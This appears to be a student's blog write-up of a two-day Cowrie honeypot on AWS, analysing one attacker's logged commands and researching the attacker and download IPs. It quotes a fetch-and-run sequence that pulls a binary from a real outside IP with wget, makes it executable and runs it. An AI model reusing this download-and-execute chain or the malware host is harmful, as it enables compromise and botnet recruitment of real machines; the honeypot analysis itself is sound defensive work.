Oct 27, 2021
The Two Day Cowrie Honeypot
I was tasked with starting up a honeypot using Amazon Web Services (AWS). I left the cowrie honeypot online for about two days and saved the info into my elastic dashboard for further threat analysis. One IP got my attention since the network host was FranTech Solutions.
___________________________________________________________________
Commands Used by IP (Repeated Three Times)
./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://194.85.249.86/x86_64
chmod 777 *
./x86_64 x86xhed
___________________________________________________________________
Looking At What The Commands Do
For some reason the first command that is ran seems to be running a file that is not on the computer as of yet. I’ve tried running this file in the tmp folder which I’m assuming is where it’s supposed to be from the following commands.
Now for the next command, I didn’t know what it meant even after using it in the command line. I went on the internet and this is what I found. It seems that using the cat command on /etc/issue displays a welcome or/and warning line to ssh users when logging in.
The next command that is used is going to the tmp directory, to presumably download malware which is what is done.
The IP address of 194.85.249.86 is used as the web browser using the command wget which downloads content from web browsers.
After the file is downloaded, the permissions are changed to allow read, write and execute access to all users. After that, the command is then executed.
___________________________________________________________________
What I Found Researching the Attackers IP
For this next section I will display the information I found on this IP through various websites which I will of course provide the URLs for. I first started off with the research of the attackers IP.
Clicking on the IP address in the dashboard brought me to this information page which gave me the origins of this IP. The location of the IP is in Las Vegas, United States. The network owner of this IP is FranTech Solutions which has some history hosting malware like the one I’ve encountered. The email reputation is poor, so from that I can assume emails from this IP are usually meant to harm the receiver.
The location data coming from Las Vegas make sense. Las Vegas is a very good place to host data servers, from what the web says “Las Vegas is the #1 Safest City From Natural Disasters in the USA”.
This was a nice find for me because this in the beginning solidified that this was a dangerous IP, which of course is expected. Still, having solid evidence like this is great.
Brightcloud gave me confirmation that this IP was trying to host a botnet which is typical for a honeypot. Though this was expected, its still good to have backing evidence.
From the information above it shows that the attacks are coming from the middle of California. This is actually very near the network host location, which is Las Vegas.
This screenshot was taken from the dashboard section of Elastic. It shows the usernames and passwords used by the attacker IP to try and login to the honeypot, which all lead to failure. The bigger the credential means the more the attacker tried it. As you can see “root” as the username was used the most because if they somehow logged in as root they would have access to just about everything.
This site is called ipvoid.com. This website lets you input an IP address to look up and then display details in this table format. The blacklist status says that it is 20/115, the blacklist coming from DNS-based blacklist (DNSBL).
___________________________________________________________________
What I Found From the Wget IP
This is the information that I found while doing some research on the IP that I found in the command line.
This screenshot shows the related host and IP. This has more poor email reputation status which isn’t too surprising considering this is used as malware in the wget command. Strangely enough this IP draws its origins from Germany of all places. I’d think it would originate from the US because that’s where the host is.
Using the website brightcloud showed me strangely enough that there is no threat found on the wget IP, despite other sources saying that this IP is in fact dangerous.
From using the same website as before I was able to see that this IP (unsurprisingly) is blacklisted. Not as many blacklists as the previous query, but blacklisted nonetheless.
